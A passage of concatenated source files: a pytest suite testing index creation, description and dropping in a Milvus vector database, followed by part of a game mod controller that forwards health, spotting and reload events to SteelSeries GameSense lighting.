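# seconds and returns False if the event was not set in time, e.g.:
#
#   if not started_evt.wait(timeout=30):
#       print('countdown did not start within 30 seconds')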
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import Milvus, IndexType, MetricType
from utils import *
nb = 10000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 60
nprobe = 1
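# Shared test data: nb random vectors of dimension dim, L2-normalized so that both the
# L2 and IP metric tables behave predictably; nprobe and BUILD_TIMEOUT are reused below.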
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index_params()
)
def get_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, table, get_index_params):
'''
target: test create index interface
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, table):
'''
target: test create index without connection
method: create index with a disconnected client
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(table, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, table, get_index_params):
'''
target: test create index interface, search with more query vectors
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
logging.getLogger().info(connect.describe_index(table))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
status, result = connect.search_vectors(table, top_k, nprobe, query_vecs)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, table, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(table, vectors)
def build(connect):
status = connect.create_index(table)
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multitable(self, connect, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
table = []
j = 0
while j < (process_num*loop_num):
table_name = gen_unique_str("test_create_index_multiprocessing")
table.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_table(param)
j = j + 1
def create_index(connect, ids):
i = 0
while i < loop_num:
# assert connect.has_table(table[ids*process_num+i])
status, ids = connect.add_vectors(table[ids*process_num+i], vectors)
status = connect.create_index(table[ids*process_num+i])
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table[ids*process_num+i], top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_table_not_existed(self, connect):
'''
target: test create index interface when table name not existed
method: create index with a table name that has not been created
expected: return code not equals to 0, create index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table_name, index_param)
assert not status.OK()
def test_create_index_table_None(self, connect):
'''
target: test create index interface when table name is None
method: create index with table_name set to None
expected: return code not equals to 0, create index failed
'''
table_name = None
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(table_name, index_param)
def test_create_index_no_vectors(self, connect, table):
'''
target: test create index interface when there are no vectors in the table
method: create table and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, table, get_simple_index_params):
'''
target: test that creating an index when there are no vectors in the table does not affect the subsequent process
method: create table and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index_params
status = connect.create_index(table, index_param)
status, ids = connect.add_vectors(table, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, table, get_simple_index_params):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after an index has been built
expected: return code success, and search ok
'''
status, ids = connect.add_vectors(table, vectors)
index_param = get_simple_index_params
status = connect.create_index(table, index_param)
status = connect.create_index(table, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, table):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = 16384
status, ids = connect.add_vectors(table, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
index_params = [{"index_type": index_type_1, "nlist": nlist}, {"index_type": index_type_2, "nlist": nlist}]
logging.getLogger().info(index_params)
for index_param in index_params:
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
assert result._nlist == nlist
assert result._table_name == table
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, table, get_index_params):
'''
target: test describe index interface
method: create table and add vectors in it, create index, call describe index
expected: return code 0, and the index structure is returned
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table
assert result._index_type == index_params["index_type"]
def test_describe_and_drop_index_multi_tables(self, connect, get_simple_index_params):
'''
target: test create, describe and drop index interface with multiple tables of L2
method: create tables and add vectors in it, create index, call describe index
expected: return code 0, and the index structure is returned
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(10):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
index_params = get_simple_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
status = connect.create_index(table_name, index_params)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table_list[i]
assert result._index_type == index_params["index_type"]
for i in range(10):
status = connect.drop_index(table_list[i])
assert status.OK()
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, table):
'''
target: test describe index without connection
method: describe index with a disconnected client
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(table)
def test_describe_index_table_not_existed(self, connect):
'''
target: test describe index interface when table name not existed
method: describe index with a table name that has not been created
expected: return code not equals to 0, describe index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(table_name)
assert not status.OK()
def test_describe_index_table_None(self, connect):
'''
target: test describe index interface when table name is None
method: describe index with table_name set to None
expected: return code not equals to 0, describe index failed
'''
table_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(table_name)
def test_describe_index_not_create(self, connect, table):
'''
target: test describe index interface when index not created
method: create table and add vectors in it, then describe the index without creating one
expected: return code equals to 0, and the default index info is returned
'''
status, ids = connect.add_vectors(table, vectors)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert status.OK()
# assert result._nlist == index_params["nlist"]
# assert result._table_name == table
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, table, get_index_params):
'''
target: test drop index interface
method: create table and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_index_params
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, table, get_index_params):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_index_params
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, table):
'''
target: test drop index without connection
method: drop index with a disconnected client
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(table)
def test_drop_index_table_not_existed(self, connect):
'''
target: test drop index interface when table name not existed
method: drop index with a table name that has not been created
expected: return code not equals to 0, drop index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(table_name)
assert not status.OK()
def test_drop_index_table_None(self, connect):
'''
target: test drop index interface when table name is None
method: drop index with table_name set to None
expected: return code not equals to 0, drop index failed
'''
table_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(table_name)
def test_drop_index_table_not_create(self, connect, table):
'''
target: test drop index interface when index not created
method: create table and add vectors in it, then drop the index without creating one
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status, ids = connect.add_vectors(table, vectors)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(table)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, table, get_simple_index_params):
'''
target: test create / drop index repeatedly, using the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(table, vectors)
for i in range(2):
status = connect.create_index(table, index_params)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, table):
'''
target: test create / drop index repeatedly, using different index params
method: create index, drop index, four times, each time using different index_params to create the index
expected: return code 0
'''
nlist = 16384
index_params = [{"index_type": IndexType.IVFLAT, "nlist": nlist}, {"index_type": IndexType.IVF_SQ8, "nlist": nlist}]
status, ids = connect.add_vectors(table, vectors)
for i in range(2):
status = connect.create_index(table, index_params[i])
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index_params()
)
def get_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_table, get_index_params):
'''
target: test create index interface
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ip_table):
'''
target: test create index without connection
method: create index with a disconnected client
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ip_table, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_table, get_index_params):
'''
target: test create index interface, search with more query vectors
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
logging.getLogger().info(connect.describe_index(ip_table))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vecs)
assert status.OK()
assert len(result) == len(query_vecs)
# logging.getLogger().info(result)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_table, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_table, vectors)
def build(connect):
status = connect.create_index(ip_table)
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multitable(self, connect, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
table = []
j = 0
while j < (process_num*loop_num):
table_name = gen_unique_str("test_create_index_multiprocessing")
table.append(table_name)
param = {'table_name': table_name,
'dimension': dim}
connect.create_table(param)
j = j + 1
def create_index(connect, ids):
i = 0
while i < loop_num:
# assert connect.has_table(table[ids*process_num+i])
status, ids = connect.add_vectors(table[ids*process_num+i], vectors)
status = connect.create_index(table[ids*process_num+i])
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table[ids*process_num+i], top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_table):
'''
target: test create index interface when there are no vectors in the table
method: create table and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(ip_table, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_table, get_simple_index_params):
'''
target: test that creating an index when there are no vectors in the table does not affect the subsequent process
method: create table and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index_params
status = connect.create_index(ip_table, index_param)
status, ids = connect.add_vectors(ip_table, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_table):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after an index has been built
expected: return code success, and search ok
'''
nlist = 16384
status, ids = connect.add_vectors(ip_table, vectors)
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(ip_table, index_param)
status = connect.create_index(ip_table, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_table):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = 16384
status, ids = connect.add_vectors(ip_table, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
index_params = [{"index_type": index_type_1, "nlist": nlist}, {"index_type": index_type_2, "nlist": nlist}]
logging.getLogger().info(index_params)
for index_param in index_params:
status = connect.create_index(ip_table, index_param)
assert status.OK()
status, result = connect.describe_index(ip_table)
assert result._nlist == nlist
assert result._table_name == ip_table
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_table, get_index_params):
'''
target: test describe index interface
method: create table and add vectors in it, create index, call describe index
expected: return code 0, and the index structure is returned
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == ip_table
assert result._index_type == index_params["index_type"]
def test_describe_and_drop_index_multi_tables(self, connect, get_simple_index_params):
'''
target: test create, describe and drop index interface with multiple tables of IP
method: create tables and add vectors in it, create index, call describe index
expected: return code 0, and the index structure is returned
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(10):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
index_params = get_simple_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
status = connect.create_index(table_name, index_params)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table_list[i]
assert result._index_type == index_params["index_type"]
for i in range(10):
status = connect.drop_index(table_list[i])
assert status.OK()
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, ip_table):
'''
target: test describe index without connection
method: describe index with a disconnected client
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(ip_table)
def test_describe_index_not_create(self, connect, ip_table):
'''
target: test describe index interface when index not created
method: create table and add vectors in it, then describe the index without creating one
expected: return code equals to 0, and the default index info is returned
'''
status, ids = connect.add_vectors(ip_table, vectors)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert status.OK()
# assert result._nlist == index_params["nlist"]
# assert result._table_name == table
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_table, get_index_params):
'''
target: test drop index interface
method: create table and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_params = get_index_params
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, ip_table, get_simple_index_params):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, ip_table):
'''
target: test drop index without connection
method: drop index with a disconnected client
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVFLAT, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(ip_table, index_param)
def test_drop_index_table_not_create(self, connect, ip_table):
'''
target: test drop index interface when index not created
method: create table and add vectors in it, then drop the index without creating one
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
logging.getLogger().info(index_param)
status, ids = connect.add_vectors(ip_table, vectors)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_table)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, ip_table, get_simple_index_params):
'''
target: test create / drop index repeatedly, using the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(ip_table, vectors)
for i in range(2):
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_table):
'''
target: test create / drop index repeatedly, using different index params
method: create index, drop index, four times, each time using different index_params to create the index
expected: return code 0
'''
nlist = 16384
index_params = [{"index_type": IndexType.IVFLAT, "nlist": nlist}, {"index_type": IndexType.IVF_SQ8, "nlist": nlist}]
status, ids = connect.add_vectors(ip_table, vectors)
for i in range(2):
status = connect.create_index(ip_table, index_params[i])
assert status.OK()
status, result = connect.describe_index(ip_table)
assert result._nlist == index_params[i]["nlist"]
assert result._table_name == ip_table
assert result._index_type == index_params[i]["index_type"]
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
class TestIndexTableInvalid(object):
"""
Test create / describe / drop index interfaces with invalid table names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_table_names()
)
def get_table_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table_name, index_param)
assert not status.OK()
@pytest.mark.level(2)
def test_describe_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
status, result = connect.describe_index(table_name)
assert not status.OK()
@pytest.mark.level(2)
def test_drop_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
status = connect.drop_index(table_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid table names, table names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index_params()
)
def get_index_params(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_index_with_invalid_index_params(self, connect, table, get_index_params):
index_params = get_index_params
index_type = index_params["index_type"]
nlist = index_params["nlist"]
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
# if not isinstance(index_type, int) or not isinstance(nlist, int):
with pytest.raises(Exception) as e:
status = connect.create_index(table, index_params)
# else:
# status = connect.create_index(table, index_params)
# assert not status.OK()
|
Controller.py
|
import sys, os
from gui.gamesense import steelseries_gamesense
import steelseries_gamesense
import threading
import time
import Threads
import mod_gamesense_logger as logger
from config import Config as cfg
class Controller(object):
def __init__(self):
# Controller configuration
self.CtrlConfig_ClearOldGameSenseEvents = cfg["gamesense_config"]["clear_events_on_init"]
# Controller state
self.CtrlState_isInitialized = False
self.CtrlState_prevTimeLeft = 0.0
self.CtrlState_prevTimestamp = 0.0
# SteelSeries GameSense properties
self.GameSense_Name = cfg["gamesense_config"]["game_name"]
self.GameSense_NameHR = cfg["gamesense_config"]["game_nameHR"]
self.GameSense_DeviceType = cfg["gamesense_config"]["device_type"]
self.GameSense_ZoneHealth = cfg["gamesense_config"]["zone_health"]
self.GameSense_ZoneSpot = cfg["gamesense_config"]["zone_spot"]
self.GameSense_ZoneReload = cfg["gamesense_config"]["zone_reload"]
# global thread objects
self.Thread_KeepAlive = None
self.Thread_ResetSpotIndicator = None
self.Thread_UpdateReloadIndicator = None
Threads.GameSense_Name = self.GameSense_Name
return
def onHealthChanged(self, newHealth, maxHealth):
value = int((float(newHealth) / float(maxHealth)) * 100)
steelseries_gamesense.sendHealthEvent(self.GameSense_Name, value)
logger.logDebug("onHealthChanged called. | max health: ", maxHealth, " | ", newHealth, " event value: ", value)
def onEnterWorld(self):
"""
The game starts and everything gets initialized.
"""
logger.logTrace("onEnterWorld called.")
logger.logDebug("Exe: ", sys.executable, "Import module search path: ", os.__file__)
# Initialize GameSense events
if not self.CtrlState_isInitialized:
self.CtrlState_isInitialized = True
steelseries_gamesense.readSteelseriesEnginePort.logged = False
# bind events
steelseries_gamesense.bindHealthEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneHealth, self.CtrlConfig_ClearOldGameSenseEvents)
steelseries_gamesense.bindSpotEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneSpot, self.CtrlConfig_ClearOldGameSenseEvents)
steelseries_gamesense.bindReloadEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneReload, self.CtrlConfig_ClearOldGameSenseEvents)
# send init values for events
steelseries_gamesense.sendSpotEvent(self.GameSense_Name, 0)
steelseries_gamesense.sendReloadEvent(self.GameSense_Name, 100)
steelseries_gamesense.sendHealthEvent(self.GameSense_Name, 100)
# send meta data
steelseries_gamesense.sendGameMetaData(self.GameSense_Name, self.GameSense_NameHR, cfg["repo_info"]["author"])
# Start a thread for heartbeats to GameSense
if not self.Thread_KeepAlive:
self.Thread_KeepAlive = threading.Thread(target=Threads.keepGameSenseAlive, args=())
self.Thread_KeepAlive.start()
logger.logTrace("keepAliveThread started.")
def onLeaveWorld(self):
# print(logPrefix + "onLeaveWorld called.")
self.CtrlState_isInitialized = False
self.CtrlState_prevTimeLeft = 0.0
self.CtrlState_prevTimestamp = 0.0
if self.Thread_KeepAlive:
Threads.keepGameSenseAlive.terminate = True
self.Thread_KeepAlive = None
logger.logTrace("keepAliveThread stopped.")
if self.Thread_ResetSpotIndicator:
Threads.resetSpotIndicator.terminate = True
self.Thread_ResetSpotIndicator = None
logger.logTrace("resetSpotIndicatorThread stopped.")
if self.Thread_UpdateReloadIndicator:
Threads.updateReloadIndicator.terminate = True
self.Thread_UpdateReloadIndicator = None
logger.logTrace("updateReloadIndicatorThread stopped.")
# stop GameSense game
steelseries_gamesense.sendStopGame(self.GameSense_Name)
def showSixthSenseIndicator(self):
steelseries_gamesense.sendSpotEvent(self.GameSense_Name, 1)
self.Thread_ResetSpotIndicator = threading.Thread(target=Threads.resetSpotIndicator, args=())
self.Thread_ResetSpotIndicator.start()
logger.logTrace("resetSpotIndicatorThread started.")
def updateVehicleGunReloadTime(self, timeLeft, baseTime):
epsilon = 0.001
currentTimeSec = lambda: time.time()
        # Sometimes this method is called with a timeLeft value that cannot be correct (e.g. 0 even though reloading has only just started).
        # Therefore only accept the new timeLeft when it is greater than 0 (+ epsilon),
        # or when it is 0 but the time elapsed since the last update is at least as large as the difference between the old and new timeLeft values.
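        # Worked example (illustrative numbers, not taken from the mod): with
        # prevTimeLeft = 5.0 s recorded at t = 100.0 s, a call at t = 100.4 s
        # reporting timeLeft = 0.0 is rejected, because 0.0 < epsilon and
        # |5.0 - 0.0| = 5.0 > |100.4 - 100.0 + epsilon| ~= 0.4. A later call at
        # t = 105.2 s with timeLeft = 0.0 is accepted, since 5.0 <= ~5.2.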
if ( (abs(timeLeft) >= epsilon) or (abs(self.CtrlState_prevTimeLeft-timeLeft) <= abs(currentTimeSec() - self.CtrlState_prevTimestamp + epsilon)) ):
